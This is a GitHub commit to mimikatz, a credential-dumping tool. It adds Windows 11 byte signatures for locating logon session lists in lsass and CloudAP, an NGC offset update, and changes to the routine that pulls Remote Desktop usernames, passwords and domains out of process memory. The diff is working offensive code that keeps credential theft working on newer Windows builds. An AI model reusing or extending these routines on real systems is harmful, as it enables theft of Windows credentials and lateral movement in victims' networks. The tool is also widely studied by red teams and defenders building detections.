[fix] mimikatz ts::logonpasswords search routines for Web credentials…

…, thank you Lawrence Abrams (@Bleeping)
gentilkiwi · Aug 9, 2021 · d05fa5d · d05fa5d
1 parent 8c125e9
commit d05fa5d
Show file tree

Hide file tree

Showing 7 changed files with 27 additions and 7 deletions.
diff --git a/inc/globals.h b/inc/globals.h
@@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_MIN_BUILD_7		7000
 #define KULL_M_WIN_MIN_BUILD_8		8000
 #define KULL_M_WIN_MIN_BUILD_BLUE	9400
-#define KULL_M_WIN_MIN_BUILD_10		9800
+#define KULL_M_WIN_MIN_BUILD_10		9800
+#define KULL_M_WIN_MIN_BUILD_11		22000
diff --git a/mimikatz/modules/kuhl_m_ts.c b/mimikatz/modules/kuhl_m_ts.c
@@ -272,14 +272,13 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
 					{
 						pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
 						if(
-							(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
+							(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
 							&&
 							(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
 							)
 						{
-
 							if(
-								(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
+								(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
 								&&
 								(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
 								)
@@ -289,7 +288,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
 								ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);
 
 								if(
-									(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
+									(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
 									&&
 									(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
 									)

diff --git a/mimikatz/modules/ngc/kuhl_m_ngc.c b/mimikatz/modules/ngc/kuhl_m_ngc.c
@@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
 				{
 					if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
 					{
-						aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
+						aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
 						if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
 						{
 							aRemote.address = containerManager.unk7;

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[]	= {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
 BYTE PTRN_WN6x_LogonSessionList[]	= {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 BYTE PTRN_WN1703_LogonSessionList[]	= {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
 BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
+BYTE PTRN_WN11_LogonSessionList[]	= {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_XP,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4,   0}},
 	{KULL_M_WIN_BUILD_2K3,		{sizeof(PTRN_WIN5_LogonSessionList),	PTRN_WIN5_LogonSessionList},	{0, NULL}, {-4, -45}},
@@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WN1703_LogonSessionList),	PTRN_WN1703_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN1803_LogonSessionList),	PTRN_WN1803_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1903,	{sizeof(PTRN_WN6x_LogonSessionList),	PTRN_WN6x_LogonSessionList},	{0, NULL}, {23,  -4}},
+	{KULL_M_WIN_MIN_BUILD_11,	{sizeof(PTRN_WN11_LogonSessionList),	PTRN_WN11_LogonSessionList},	{0, NULL}, {24,  -4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WN51_LogonSessionList[]	= {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
@@ -7,8 +7,10 @@
 
 #if defined(_M_X64)
 BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
+BYTE PTRN_WN11_CloudApLocateLogonSession[]	= {0x48, 0x8b, 0xd1, 0x49, 0x3b, 0xc1, 0x75};
 KULL_M_PATCH_GENERIC CloudApReferences[] = {
 	{KULL_M_WIN_BUILD_10_1909,	{sizeof(PTRN_WALL_CloudApLocateLogonSession),	PTRN_WALL_CloudApLocateLogonSession},	{0, NULL}, {-9}},
+	{KULL_M_WIN_MIN_BUILD_11,	{sizeof(PTRN_WN11_CloudApLocateLogonSession),	PTRN_WN11_CloudApLocateLogonSession},	{0, NULL}, {-4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x8b, 0x31, 0x39, 0x72, 0x10, 0x75};

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
@@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
 	DWORD64 unk3;
 	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
 	// ...
-} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
+
+typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
+	struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
+	DWORD unk0;
+	DWORD unk1;
+	DWORD unk2;
+	LUID	LocallyUniqueIdentifier;
+	DWORD unk3;
+	DWORD unk4;
+	DWORD unk5;
+	DWORD unk6;
+	PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
+	// ...
+} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
diff --git a/modules/kull_m_memory.c b/modules/kull_m_memory.c
@@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
 			kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
 			break;
 		default:
+			SetLastError(ERROR_NOT_SUPPORTED);
 			break;
 	}
 	return (Address->address) != NULL;